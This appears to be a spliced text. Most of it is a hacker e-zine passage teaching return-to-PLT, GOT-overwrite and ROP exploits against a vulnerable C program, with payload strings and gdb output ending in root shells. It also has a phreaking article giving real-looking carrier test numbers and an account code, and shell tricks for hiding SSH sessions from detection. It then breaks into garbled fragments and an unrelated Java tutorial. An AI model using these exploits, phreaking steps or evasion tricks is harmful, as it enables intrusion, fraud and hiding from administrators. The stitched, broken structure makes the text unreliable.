was not a viable option (say, input filtering), we could substitute it with 0x0022abfd with no consequence. We still have to deal with the problem of ASCII-Armor, however, so let's move on to talk about a technique called return-to-PLT. V. Return-to-PLT ================ The PLT, formally known as the Procedure Linkage Table, is a feature of ELF binaries that assists with the dynamic linking process. In order to understand how to abuse this feature, we need to first know a bit about what's happening behind the scenes. By nature, ELF shared libraries are compiled as position-independent code (PIC), which means that they function and execute properly regardless of location in memory. This is fundamentally important to dynamic linking, because if all shared libraries were compiled with a static load address, a situation would inevitably arise where two libraries shared the same load address or overlapped each other in memory. By compiling shared libraries as PIC, the ELF linker decides at runtime which libraries to load and where in memory to map them to. In order for the running program to find symbols within these libraries, it references a data structure called the Global Offset Table (GOT), which exists as a table of pointers to within shared libraries. For Windows exploit developers, the GOT is essentially the same as the Import Address Table (IAT). When a function is called for the first time, a small piece of code is executed by the PLT to resolve the function's actual address. The GOT is patched with this address so that future calls to the library function's PLT stub directly reference the resolved address, resulting in greater efficiency. This is called lazy binding. In the realm of exploitation, if the libc function you wish to call is legitimately used by the program, then it's as simple as calling the function's PLT stub. For instance, if system() is used elsewhere in the program, then an entry for it will exist in the PLT. Jumping directly to this address will execute the PLT stub, resolving the real address of the function in libc (or using the stored one in the GOT) and calling it. By adding a call to system() elsewhere in our test program, we can observe this situation and take advantage of it. [storm@Dysthymia audit]$ cat example.c #include <string.h> #include <stdlib.h> void foo (char *bar) { char c[12]; strcpy(c, bar); // no bounds checking... system("/bin/echo woot"); } int main (int argc, char **argv) { foo(argv[1]); } system 0x08048304 system@plt 0x08048314 __libc_start_main 0x08048314 __libc_start_main@plt 0x08048324 strcpy 0x08048324 strcpy@plt 0x08048340 _start 0x08048370 __do_global_dtors_aux 0x080483d0 frame_dummy 0x080483f4 foo 0x0804841a main 0x08048440 __libc_csu_init 0x080484a0 __libc_csu_fini 0x080484a5 __i686.get_pc_thunk.bx 0x080484b0 __do_global_ctors_aux 0x080484dc _fini (gdb) break main Breakpoint 1 at 0x804841d (gdb) run Starting program: /home/storm/Desktop/audit/example Breakpoint 1, 0x0804841d in main () (gdb) find $esp, 0xbfffffff, "/bin/bash" 0xbffff310 1 pattern found. (gdb) run `perl -e'print "A"x24 . "\x04\x83\x04\x08" . "XXXX" . "\x10\xf3\xff\xbf"'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x04\x83\x04\x08" . "XXXX" . "\x10\xf3\xff\xbf"'` Breakpoint 1, 0x0804841d in main () (gdb) c Continuing. Detaching after fork from child process 8096. woot Detaching after fork from child process 8097. [storm@Dysthymia audit]$ echo We\'ve got shell. We've got shell. [storm@Dysthymia audit]$ VI. Return-to-PLT + Overwrite ============================= Of course, system() is not always going to be available, and sometimes the functions that are available to just don't cut it. At this point, we can take it another step further and take advantage of a different feature of dynamic linking by overwriting entries in the GOT itself. Let's modify our test program a little more before continuing on, removing the call to system() and adding a call to printf(): [storm@Dysthymia audit]$ cat example.c #include <string.h> #include <stdio.h> void foo (char *bar) { char c[12]; strcpy(c, bar); // no bounds checking... } int main (int argc, char **argv) { foo(argv[1]); printf("Your input: %s\n", argv[1]); } [storm@Dysthymia audit]$ Let's take a closer look at the PLT stub for printf(): __libc_start_main 0x08048304 __libc_start_main@plt 0x08048314 strcpy 0x08048314 strcpy@plt 0x08048324 printf 0x08048324 printf@plt 0x08048340 _start 0x08048370 __do_global_dtors_aux 0x080483d0 frame_dummy 0x080483f4 foo 0x0804840e main 0x08048450 __libc_csu_init 0x080484b0 __libc_csu_fini 0x080484b5 __i686.get_pc_thunk.bx 0x080484c0 __do_global_ctors_aux 0x080484ec _fini (gdb) x/3i 0x08048324 0x8048324 <printf@plt>: jmp *0x80496bc 0x804832a <printf@plt+6>: push $0x18 0x804832f <printf@plt+11>: jmp 0x80482e4 (gdb) This first instruction is interesting. It's dereferencing a pointer to somewhere in the GOT and then jumping to that value. Let's look back to our program that reads /proc/self/maps: [storm@Dysthymia audit]$ ./stacky | grep 08049 08048000-08049000 r-xp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky 08049000-0804a000 rw-p 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky [storm@Dysthymia audit]$ It looks like the GOT is writable! By chaining together calls to libc, we can write four arbitrary bytes to 0x80496bc, effectively relocating printf() to an address of our choosing. The next time printf() is called, our target code will be run instead. As usual, our goal here will be system(). There is really no reason for a pointer to system() to be present anywhere in memory, so we're going to have to construct it byte-by-byte. Note that while we're using strcpy() for our exploit, any function that moves bytes may be used, such as memcpy(), strcat(), or sprintf(). Let's build a new template: AAAAAAAAAAAAAAAAAAAAAAAA [ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[0] ] [ system[0] ] [ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[1] ] [ system[1] ] [ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[2] ] [ system[2] ] [ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[3] ] [ system[3] ] [ printf@plt ] [ any 4 bytes ] [ address of "/bin/bash" ] Conceptually, the process will first return into strcpy(), moving the first byte of &system into the first byte of GOT entry for printf() (as well as anything after it up until 0x00 since we're using strcpy(), but this doesn't really matter). Upon returning from strcpy(), it will then jump into a pop pop ret gadget, which pops the two arguments of the first strcpy() off the stack and returns into the second strcpy(), granting us the ability to chain libc calls with two arguments. Wait, did we say gadget? It's almost like we're writing a ROP exploit or something.... A gadget is essentially a small sequence of instructions that exists in the process's address space that does something useful for our exploit. By returning into a gadget, we can leverage existing code to manipulate memory and registers in a predictable way. While gadgets come in many different forms and can perform many different operations, one thing that always remains constant is that they are terminated by a ret instruction. In a "true" ROP exploit, our libc chain is replaced instead by a chain of pointers to gadgets, executing one after another to set the process memory in a specific state to perform a specific task. For instance, on Windows 32-bit systems, one of the most common methods of ROP exploitation is to allocate a new executable heap by returning into VirtualAlloc() or marking an existing heap executable using VirtualProtect(). Gadgets are then used to copy second-stage shellcode onto the newly-created heap, ultimately jumping into the heap and executing the shellcode. In order to find our pop pop ret gadget, we'll use msfelfscan, part of the Metasploit framework. If developing an exploit on Win32, the mona.py plugin for Immunity Debugger by Corelan Team is one of the best options for not only discovering potential gadget candidates, but automatically chaining them into workable ROP chains. [storm@Dysthymia audit]$ msfelfscan | grep \\-p -p, --poppopret Search for pop+pop+ret combinations [storm@Dysthymia audit]$ msfelfscan -p ./example [./example] 0x080483c3 pop ebx; pop ebp; ret 0x080484a7 pop edi; pop ebp; ret 0x080484e8 pop ebx; pop ebp; ret [storm@Dysthymia audit]$ Any of these gadgets should do fine. Let's update our template with what we know so far: strcpy@plt, printf@plt, GOT_of_printf, and pop pop ret. Let's just stick "AAAA" in the return address of the overwritten printf(), since it really doesn't matter. While we're at it, let's just find the address of "/bin/bash" too: (gdb) run Starting program: /home/storm/Desktop/audit/example Breakpoint 1, 0x08048411 in main () (gdb) find $esp, 0xbfffffff, "/bin/bash" 0xbffff310 1 pattern found. (gdb) So, that brings us to: AAAAAAAAA... [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbc\x96\x04\x08 ] [ system[0] ] [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbd\x96\x04\x08 ] [ system[1] ] [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbe\x96\x04\x08 ] [ system[2] ] [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbf\x96\x04\x08 ] [ system[3] ] [ \x24\x83\x04\x08 ] [ \x41\x41\x41\x41 ] [ \x10\xf3\xff\xbf ] All we have left to do is find the locations of four bytes in memory that will be assembled together to form &system. (gdb) p system $1 = {<text variable, no debug info>} 0x235eb0 <__libc_system> (gdb) These four bytes are: 0x00, 0x23, 0x5e, and 0xb0. It will be pretty easy to find these bytes somewhere in memory, but for the greatest reliability we should confine the search to just within the loaded program itself. For obvious reasons, we can't directly address the shared libraries, and the stack and heap are too dynamic for reliable use. By looking back at the output of ./stacky in the beginning of this paper, we notice that the memory region 0x08048000-0x0804a000 remains static throughout every invocation of the program, both with and without ASLR enabled. By looking at the ELF header of ./example, we see that within this region of memory resides the binary image itself: [storm@Dysthymia audit]$ readelf -S ./example There are 30 section headers, starting at offset 0x7ec: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .interp PROGBITS 08048134 000134 000013 00 A 0 0 1 <---- start [ 2] .note.ABI-tag NOTE 08048148 000148 000020 00 A 0 0 4 [ 3] .note.gnu.build-i NOTE 08048168 000168 000024 00 A 0 0 4 [ 4] .gnu.hash GNU_HASH 0804818c 00018c 000020 04 A 5 0 4 [ 5] .dynsym DYNSYM 080481ac 0001ac 000060 10 A 6 1 4 [ 6] .dynstr STRTAB 0804820c 00020c 000053 00 A 0 0 1 [ 7] .gnu.version VERSYM 08048260 000260 00000c 02 A 5 0 2 [ 8] .gnu.version_r VERNEED 0804826c 00026c 000020 00 A 6 1 4 [ 9] .rel.dyn REL 0804828c 00028c 000008 08 A 5 0 4 [10] .rel.plt REL 08048294 000294 000020 08 A 5 12 4 [11] .init PROGBITS 080482b4 0002b4 000030 00 AX 0 0 4 [12] .plt PROGBITS 080482e4 0002e4 000050 04 AX 0 0 4 [13] .text PROGBITS 08048340 000340 0001ac 00 AX 0 0 16 [14] .fini PROGBITS 080484ec 0004ec 00001c 00 AX 0 0 4 [15] .rodata PROGBITS 08048508 000508 00001c 00 A 0 0 4 [16] .eh_frame_hdr PROGBITS 08048524 000524 000024 00 A 0 0 4 [17] .eh_frame PROGBITS 08048548 000548 00007c 00 A 0 0 4 [18] .ctors PROGBITS 080495c4 0005c4 000008 00 WA 0 0 4 [19] .dtors PROGBITS 080495cc 0005cc 000008 00 WA 0 0 4 [20] .jcr PROGBITS 080495d4 0005d4 000004 00 WA 0 0 4 [21] .dynamic DYNAMIC 080495d8 0005d8 0000c8 08 WA 6 0 4 [22] .got PROGBITS 080496a0 0006a0 000004 04 WA 0 0 4 [23] .got.plt PROGBITS 080496a4 0006a4 00001c 04 WA 0 0 4 [24] .data PROGBITS 080496c0 0006c0 000004 00 WA 0 0 4 [25] .bss NOBITS 080496c4 0006c4 000008 00 WA 0 0 4 <---- end [26] .comment PROGBITS 00000000 0006c4 00002c 01 MS 0 0 1 [27] .shstrtab STRTAB 00000000 0006f0 0000fc 00 0 0 1 [28] .symtab SYMTAB 00000000 000c9c 000430 10 29 45 4 [29] .strtab STRTAB 00000000 0010cc 000215 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings) I (info), L (link order), G (group), x (unknown) O (extra OS processing required) o (OS specific), p (processor specific) [storm@Dysthymia audit]$ Using gdb, we can quickly search for hits within this range: (gdb) find /b /1 0x08048134,0x080496c4,0x00 0x8048146 1 pattern found. (gdb) find /b /1 0x08048134,0x080496c4,0x23 0x804883c 1 pattern found. (gdb) find /b /1 0x08048134,0x080496c4,0x5e 0x8048342 <_start+2> 1 pattern found. (gdb) find /b /1 0x08048134,0x080496c4,0xb0 0x8048294 1 pattern found. (gdb) Excellent. Let's update our template one last time: AAAAAAAAA... [ ] Tie it all together and let it rip: (gdb) run "'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/storm/Desktop/audit/example "'` Detaching after fork from child process 14372. [storm@Dysthymia audit]$ echo hax hax hax hax hax hax [storm@Dysthymia audit]$ VII. Return-to-libc by neg ROP ============================== Readers should make sure they are familiar with all previous sections before continuing on. It's worthwhile to know that there is, in fact, more than one way to circumvent ASCII-Armor. A second technique discussed here is much shorter than the GOT overwrite method and relies more heavily on ROP. For this method, we'll be borrowing a common tactic used by Windows exploit developers. Instead of assembling an address byte-by-byte and patching the GOT, we can simply load the negated address of system() into a register, negate the register, and then call the value of the register. As our program is very small and doesn't contain a lot of code (and therefore very few gadgets to work with), for the sake of the example we'll introduce a few small functions that provide the appropriate neg and pop gadgets needed. Larger applications will have more code and more gadgets to choose from, greatly increasing our chances of constructing a complete, featureful ROP chain. [storm@Dysthymia audit]$ cat example.c #include <string.h> #include <stdio.h> #include <stdlib.h> void foo (char *bar) { char c[12]; strcpy(c, bar); // no bounds checking... } int coff (int p) { int x = 50008; // this integer generates a 'pop eax; ret' sequence int d = x-p; printf("Difference from threshold: %i\n", d); return d; } int tcomp (int p) { return -p; // will produce a 'pop eax' gadget } int main (int argc, char **argv) { foo(argv[1]); printf("Your input: %s\n", argv[1]); } [storm@Dysthymia audit]$ gcc example.c -o example [storm@Dysthymia audit]$ Let's build a new template for our exploit: AAAAAAAAAAAAAAAAAAAAAAAA [ pop eax ] [ two's complement of &system ] [ neg eax ] [ call eax ] ^ [ "/bin/bash" ] | overflow ("A"x24) In earlier ret2libc exploit demonstrations, we allocated a 4-byte return-to pointer between the return to system() and the function's argument, but since we are executing an actual call procedure instead of returning into system(), a return-to pointer is being pushed onto the stack for us. The next pointer immediately in our exploit string is our function argument. In order to build our ROP chain, we'll use ROPeMe to scan the binary and generate gadgets: [storm@Dysthymia audit]$ ropeme-bhus10/ropeme/ropshell.py Simple ROP interactive shell: [generate, load, search] gadgets ROPeMe> generate ./example 4 Generating gadgets for ./example with backward depth=4 It may take few minutes depends on the depth and file size... Processing code block 1/1 Generated 87 gadgets Dumping asm gadgets to file: example.ggt ... OK ROPeMe> search pop % Searching for ROP gadget: pop % with constraints: [] 0x80482e0L: pop eax ; pop ebx ; leave ;; 0x8048417L: pop eax ;; 0x80484f3L: pop ebp ; ret ; mov ebx [esp] ;; 0x80483c4L: pop ebp ;; 0x804844bL: pop ebp ;; 0x80484e8L: pop ebp ;; 0x80482e1L: pop ebx ; leave ;; 0x8048545L: pop ebx ; leave ;; 0x80483c3L: pop ebx ; pop ebp ;; 0x8048528L: pop ebx ; pop ebp ;; 0x80484e5L: pop ebx ; pop esi ; pop edi ; pop ebp ;; 0x8048544L: pop ecx ; pop ebx ; leave ;; 0x80484e7L: pop edi ; pop ebp ;; 0x80484e6L: pop esi ; pop edi ; pop ebp ;; ROPeMe> search neg % Searching for ROP gadget: neg % with constraints: [] 0x8048449L: neg eax ; pop ebp ;; ROPeMe> search call % Searching for ROP gadget: call % with constraints: [] 0x80483f0L: call eax ; leave ;; 0x8048543L: call far dword [ecx+0x5b] ; leave ;; ROPeMe> For our 'pop eax' gadget, we'll choose 0x8048417 since it's the only straightforward option. Notice that there is also a 'pop eax; pop ebx; leave ;;' gadget located at 0x80482e0, but we want to avoid gadgets like these if at all possible to prevent having to work around the leave instruction messing up the stack pointer (leave in x86 means literally 'mov esp, ebp; pop ebp'). AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ neg eax ] [ call eax ] ^ [ "/bin/bash" ] | overflow ("A"x24) For our 'neg eax' gadget, 0x8048449 is our only option but it will work fine. We'll have to work around the 'pop ebp' instruction by modifying our template and adding a junk pointer into the ROP chain immediately after the pointer to the gadget. When the gadget executes, it will first negate eax (as we want) and then pop four junk bytes to ebp, performing nothing directly useful for us but preventing the instruction from disrupting the rest of the chain. AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ \x49\x84\x04\x08 ] ^ [ \x41\x41\x41\x41 ] [ call eax ] [ "/bin/bash" ] | ^ overflow ("A"x24) ------ junk 4 bytes For our 'call eax' gadget, 0x80483f0 is our only candidate but it will also work fine. We don't have to worry about the leave instruction in this gadget since we will have already returned into system() beforehand, so the only time it will be executed is after our dropped shell is closed. At this point, the program will be heading towards a segfault anyways. AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ \x49\x84\x04\x08 ] ^ [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ "/bin/bash" ] | overflow ("A"x24) We can calculate the two's complement (negation) of &system in gdb: [storm@Dysthymia audit]$ gdb -q ./example Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done. (gdb) break main Breakpoint 1 at 0x8048450 (gdb) run Starting program: /home/storm/Desktop/audit/example Breakpoint 1, 0x08048450 in main () (gdb) p system $1 = {<text variable, no debug info>} 0x235eb0 <__libc_system> (gdb) p/x -0x235eb0 $2 = 0xffdca150 (gdb) Update: AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ \x50\xa1\xdc\xff ] [ \x49\x84\x04\x08 ] ^ [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ "/bin/bash" ] | overflow ("A"x24) Finding the location of "/bin/bash" should be routine by now: (gdb) find $esp, 0xbfffffff, "/bin/bash" 0xbffff310 1 pattern found. (gdb) And let's fill in the final part of the template: AAAAAAAAAAAAAAAAAAAAAAAA [ ] | overflow ("A"x24) And cross our fingers: (gdb) disas foo Dump of assembler code for function foo: 0x080483f4 <+0>: push %ebp 0x080483f5 <+1>: mov %esp,%ebp 0x080483f7 <+3>: sub $0x28,%esp 0x080483fa <+6>: mov 0x8(%ebp),%eax 0x080483fd <+9>: mov %eax,0x4(%esp) 0x08048401 <+13>: lea -0x14(%ebp),%eax 0x08048404 <+16>: mov %eax,(%esp) 0x08048407 <+19>: call 0x8048314 <strcpy@plt> 0x0804840c <+24>: leave 0x0804840d <+25>: ret End of assembler dump. (gdb) delete Delete all breakpoints? (y or n) y (gdb) break *0x0804840d Breakpoint 2 at 0x804840d (gdb) run "'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/storm/Desktop/audit/example "'` Breakpoint 2, 0x0804840d in foo () (gdb) x/32x $esp 0xbfffef3c: 0x08048417 0xffdca150 0x08048449 0x41414141 (gdb) x/i $eip => 0x804840d <foo+25>: ret (gdb) si Cannot access memory at address 0x41414145 (gdb) x/5i $eip => 0x8048417 <coff+9>: pop %eax 0x8048418 <coff+10>: ret 0x8048419 <coff+11>: add %al,(%eax) 0x804841b <coff+13>: mov 0x8(%ebp),%eax 0x804841e <coff+16>: mov -0xc(%ebp),%edx (gdb) si 0x08048418 in coff () (gdb) i r eax eax 0xffdca150 -2318000 (gdb) si Cannot access memory at address 0x41414145 (gdb) x/5i $eip => 0x8048449 <tcomp+6>: neg %eax 0x804844b <tcomp+8>: pop %ebp 0x804844c <tcomp+9>: ret 0x804844d <main>: push %ebp 0x804844e <main+1>: mov %esp,%ebp (gdb) si 0x0804844b in tcomp () (gdb) i r eax eax 0x235eb0 2318000 (gdb) x/32x $esp 0xbfffef48: 0x41414141 0x080483f0 0xbffff310 0x00000000 0xbfffef58: 0xbfffefd8 0x00212e36 0x00000002 0xbffff004 0xbfffef68: 0xbffff010 0xb7fff478 0x00110414 0xffffffff 0xbfffef78: 0x001f8fbc 0x08048243 0x00000001 0xbfffefc0 0xbfffef88: 0x001e8da7 0x001f9ab8 0xb7fff758 0x00381ff4 0xbfffef98: 0x00000000 0x00000000 0xbfffefd8 0xa41d67a2 0xbfffefa8: 0x199850dd 0x00000000 0x00000000 0x00000000 0xbfffefb8: 0x00000002 0x08048340 0x00000000 0x001ef420 (gdb) si 0x0804844c in tcomp () (gdb) i r ebp ebp 0x41414141 0x41414141 (gdb) x/5i $eip => 0x804844c <tcomp+9>: ret 0x804844d <main>: push %ebp 0x804844e <main+1>: mov %esp,%ebp 0x8048450 <main+3>: and $0xfffffff0,%esp 0x8048453 <main+6>: sub $0x10,%esp (gdb) x/32x $esp 0xbfffefbc: 0x08048340 0x00000000 0x001ef420 0x00212d5b (gdb) si Cannot access memory at address 0x41414145 (gdb) x/5i $eip => 0x80483f0 <frame_dummy+32>: call *%eax 0x80483f2 <frame_dummy+34>: leave 0x80483f3 <frame_dummy+35>: ret 0x80483f4 <foo>: push %ebp 0x80483f5 <foo+1>: mov %esp,%ebp (gdb) si __libc_system (line=0xbffff310 "/bin/bash") at ../sysdeps/posix/system.c:179 179 { (gdb) c Continuing. Detaching after fork from child process 16945. [storm@Dysthymia audit]$ echo ROP til you drop ROP til you drop [storm@Dysthymia audit]$ VIII. References and Further Reading ==================================== [1] [2] [3] [4] [5] Special thanks to corelanc0d3r, phetips, and zx2c4 for their review and suggestions [==================================================================================================] -=[ 0x07 A New Kind of Google Mining -=[ Author: Shadytel, Inc -=[ Website: There are two kinds of CEOs in this world: those who take advantage of every resource they possibly can, and pussies. Our arrest at a Communications Fraud Control Association convention suggests there's more of the latter than we thought, so there seemed no better time than now to help fellow corporate overlords expand their ruthlessness. There are times when scanning can flat out suck - we'll be the first to admit it. There's no better way to kill your initiative than to go through a range filled with numbers that just ring or put you on the phone with bewildered subscribers. If you're just looking for an interesting way to kill some time, there's a much easier way. Here to give you a hand is a tool you'd never expect; Google Maps. For example, let's do a search for AT&T in Terre Haute, Indiana. Keeping in mind that all the AT&T results that are legitimately cell phone stores have the AT&T logo by them, let's pick the first one that doesn't; 812-235-0096. What we got wasn't a bad start at all. "You've reached AT&T in Terre Haute, Indiana. This is an unmanned site. Please leave a message after the tone or if you need immediate assistance, contact the on-site workforce." While it's noteworthy that the mailbox in question is on a Nortel PBX, the configuration is pretty well locked down. So to even the odds out a little, we'll throw out another nifty technique - this time an IVR made by Verizon shortly before the Frontier buyout of several states. The CLEC maintenance center is pretty much what it sounds like: an IVR for switchless resellers to help test customer lines and create trouble reports. Give it a try: (877) 503-8260. Right away, you'll be asked for the OCN of the company you work for. Type in 0772; this goes for all unported Verizon or Frontier lines in ex-GTE states. Select the all other category, the state of Indiana, and give it the number to the AT&T PBX. Once it looks up the account number, you'll be greeted with four options: Press one for 812-235-0096 Press two for 812-235-0575 Press three for 812-235-4781 Press four for 812-235-5087 These all correspond to numbers associated with that same account. So not a bad way to find a few interesting numbers, right? Here's a few other nice things we found. 207-693-9920 - Sensaphone (searched for Fairpoint in Portland, ME) 406-495-1408 - Weird ANAC, test command 7 is non-functioning ringback (searched for Qwest Communications in Helena, MT) 304-263-2510 - Verizon Potomac Assignment Provisioning Center number changed recording (Searched for C&P Telco in Martinsburg, WV) That last listing brings us to two final points; first of all, type slowly - the auto-suggest feature is a better friend then you might think. Second, sometimes the best way to search is to use the names of phone companies that don't exist anymore - or just aren't generally used to do business with the public. For example, C&P Telephone hasn't existed since the Bell System breakup. MCI is another good one, but there's also quite a few numbers that ring out, so it can be a little tedious. We personally like AT&T best, since they constantly feel the need to share their more interesting internal numbers. So like the article itself, this technique probably isn't for anybody wanting a long-term project; but if you want something instantly - whether it be excitement, lulz, or puzzling contraptions to cut your teeth with, just add water. As always, keep it evil, keep it shady, keep it ruthless. [==================================================================================================] -=[ 0x08 Stupid Shell Tricks -=[ Author: teh crew Logging into SSH and interacting with a shell is probably necessary at one point or another in one's hacking career. We've compiled a list of tips and tricks from various individuals in the community that may prove helpful next time you're looking to to avoid detection and cover your tracks on a system. ----- The common way to list logged-in users has always been the `w` command. First read in article 0x04 of Phrack #64, the -T flag in ssh can be used to not allocate a tty upon login, preventing the user from being listed in `w` output: ssh -T storm@gonullyourself.org This obviously leaves you with a blank prompt, so it's not a bad idea to simulate one: ssh -T storm@gonullyourself.org bash -i For those who care, we can prevent logging the remote host's information to known_hosts through: ssh -T -o UserKnownHostsFile=/dev/null storm@gonullyourself.org bash -i Not having a tty causes some predictable issues with certain programs. Utilities like `man` and `less` will print out data in its entirety instead of fitting it to the terminal and providing scrollability. `screen` will flat-out refuse to work: [storm@mania ~]$ screen Must be connected to a terminal. Fortunately, we can fake a tty using Python which gives us somewhat broken support for some of the utilities we want to use: [storm@mania ~]$ python -c 'import pty;pty.spawn("/bin/sh")' sh-3.2$ perl -e'print "$_\n" for ( 1 .. 20 )' > .. 1. Employers 2. Roles 3. Learn from a Book 4. Learn from a Course 5. University 6. Capture the Flag and War Games 7. Communication 8. Meet People 9. Conferences 10. Certifications 11. Links 12. Friends of the Class 1.. 2..] .. 4.... * Information Security Conferences Calendar at [56]. [57] If you're working somewhere and are having trouble justifying conference attendance to your company, the Infosec Leaders blog has some helpful advice. [58] 10.+ * 12.] [==================================================================================================] -=[ [==================================================================================================]
http://packetstormsecurity.org/files/107385/Go-Null-Yourself-E-Zine-Issue-06.html
crawl-003
refinedweb
12,278
61.67
Question: Using cruzdb to retrieve SNP sequence including flanking 0 12 months ago by yarrowmadrona • 0 yarrowmadrona • 0 wrote: I want to use cruzdb to query a list of SNPs by rs id in a text file and retrieve sequence including 200 basepairs flanking each SNP. I can do this in the UCSC genome browser table by selecting "Output format" = sequence. I have some code below that I sketched together from previous posts. from cruzdb import Genome import sys file_in = sys.argv[1] file_handle = open("rs_example2.txt", 'rb') hg19 = Genome(db = 'hg19') snp147 = hg19.snp147 for rs in file_handle: rs.split()[0].strip('\n') if rs.startswith("rs"): print snp147.filter_by(name=rs).first() Unfortunately, there is no sequence information here. I also ran across the snp sequence database but not sure how to use it. hg19.snp147Seq.filter_by(name='rs9923231') ADD COMMENT • link •modified 12 months ago • written 12 months ago by yarrowmadrona • 0
https://www.biostars.org/p/254459/
CC-MAIN-2018-26
refinedweb
155
68.47
Welcome to the Java Additional Topics tutorial offered by Simplilearn. The tutorial is a part of the Java Certification Training Course. Let us begin with the objectives of this tutorial in the next section. Let us now see the topics covered in this Java additional topics tutorial - Explain Inner Classes and Inner Interfaces Define String API Define Thread Determine Collection Framework Explain Comparable Comparator and other Functional Interfaces Identify File Handling and Serialization Let us learn the Java inner classes and inner interfaces in the next section Let us now learn about the java inner class. The inner class is a class declared inside the class or interface that can access all the members of the outer class, including private data members and methods. class Outer_class { //code class Inner_class{ //code } } The code snippet above gives the scope of the outer class. Within the outer class, we have defined an inner class. The advantages of doing so include - Accessible to all data members and methods of the outer class, including private data members and methods. It develops a more maintainable and readable code. And it requires less coding effort. In our classes are also referred to as nested classes. Inner interface, also known as the nested interface, declares an interface inside another interface. public interface Map { interface Entry{ int getKey(); } void clear(); } Here we observe the outer loop of the interface and within it, we have in an interface that has been declared. The advantages include - It can be used to group interfaces together. Encapsulation can be done using inner interfaces Interfaces are used to maintain and read codes better. In the next section, we will learn about the Java threads. You too can join the high earne’s club. Enroll in our Java Certification Course and join the high earner’s club. A thread is an independent part of the execution within a program. The java.lang.Thread class enables you to create and control threads. A Java thread is composed of three main parts. They are - The virtual CPU, The code that the CPU executes, and The data on which the code works. All our systems have a processor, and ideally, then you run the public static void main program, You are typically running a single process on top of your processor. Although, your processor has much more capability. Whenever the processor has some spare time, we can start parallel processes that run in parallel within the main thread so that we can utilize the time of the processor to effectively perform some computational action. Hence, within the main thread that is already running, we can start parallel child processes or child threads that are running so that when the processor has some idle time, we can effectively utilize that idle time to do parallel processing and have multiple threads running in parallel. Each thread can then be assigned a work, which could be a function to execute or some code block to execute. A Java thread can be created by the thread class or by implementing Runnable Interface. Commonly used constructors of the Java thread class include - Thread() Thread(String name) Thread(Runnable r) Thread(Runnable r, String name) They accept either a string name of the thread or a runnable object or both. To create a thread, the java.lang.The Runnable interface is preferred over inheriting from java.lang.Thread. Since Java doesn't support multiple inheritances, the extended Java thread class will lose the chance to further extend or inherit other classes. Implementing Runnable interface will make the code easily maintainable as it does a logical separation of the task from the runner. In object-oriented programming, extending a class means modifying or improving the existing class, implementing Runnable is hence a good practice. There are two ways in which we could create a thread, one of them is where you can go ahead and inherit the thread class, in which case you cannot further inherit from any other class as java follows the single inheritance. The other way which is also a better way is to implement the Runnable interface, and then you can go ahead and inherit from a class of your choice in parallel. In the next section, let us look at an example of creating a Java Thread. Let us look at a simple example of creating a thread. Here, we have a class called ThreadTester and HelloRunner. The HelloRunner class implements the Runnable interface. Run method is the method that will be called the moment we start the thread and this method has been defined inside the Runnable interface.; } } } } In the next section, we will look at synchronizing a Java thread. Synchronized keyword enables a programmer to control threads that are sharing data. Synchronization can be done in two ways - It can be applied before a thread. It can be applied after the trip. Every object is associated with a flag called object lock flag, and this flag is enabled by a synchronized keyword. Let us now look at Applying synchronized before a thread and Applying synchronized after a thread. To apply synchronized before a thread. When a thread reaches the synchronized statement, it examines the object, passed as the argument, and tries to obtain the lock flag from that object before continuing to the next step. Here, the moment this particular code block is accessed, the thread simply tries to acquire a lock over this block of code and then proceeds with processing this code block. In this example, we see that the synchronization is applied after a thread. That is where it will try to acquire a lock on this particular block of code. This is an example of the applying or acquiring a synchronized lock after the thread. In the next section, we will learn about Java Deadlock. Deadlock is a part of the Java multithreading. It occurs when a thread is waiting for an object lock that is held by another thread. But, the other thread is waiting for an object lock that has already been held by the first thread. Let us understand deadlock with an example. public class TestThread { public static Object Lock1 = new Object(); public static Object Lock2 = new Object(); public static void main(String args[]) { Thread1 T1 = new Thread1(); Thread2 T2 = new Thread2(); T1.start(); T2.start(); } private static class Thread1 extends Thread { public void run() { synchronized (Lock1) { System.out.println("Thread 1: Hold lock 1..."); try { Thread.sleep(15); } catch (InterruptedException e) {} System.out.println("Thread 1: Wait lock 2..."); synchronized (Lock2) { System.out.println("Thread 1: hold lock 1 & 2..."); } } } } private static class Thread2 extends Thread { public void run() { synchronized (Lock2) { System.out.println("Thread 2: Hold lock 2..."); try { Thread.sleep(10); } catch (InterruptedException e) {} System.out.println("Thread 2: Wait for lock 1..."); synchronized (Lock1) { System.out.println("Thread 2: Hold lock 1 & 2..."); } } } } } Output: Thread 1: Hold lock 1… Thread 2: Hold lock 2… Thread 1: Wait for lock 1… Thread 2: Wait for lock 2… In the next section, we will look at the Java collection framework. This is part of the java.util.Collections package. The java.util.Collections class consists exclusively of static methods that operate on or return collections. It contains polymorphic algorithms that operate on collections, "wrappers" (which return a new collection backed by a specified collection), and a few other odds and ends. The methods of this class all throw a NullPointerException if the collections or class objects provided to them are null. The fields for java.util.Collections class: There are several purposes of implementation of core interfaces (Set, List, and Map) available as part of the Collection framework. This allows us to store information in memory which could be without a restriction often array where an array has a 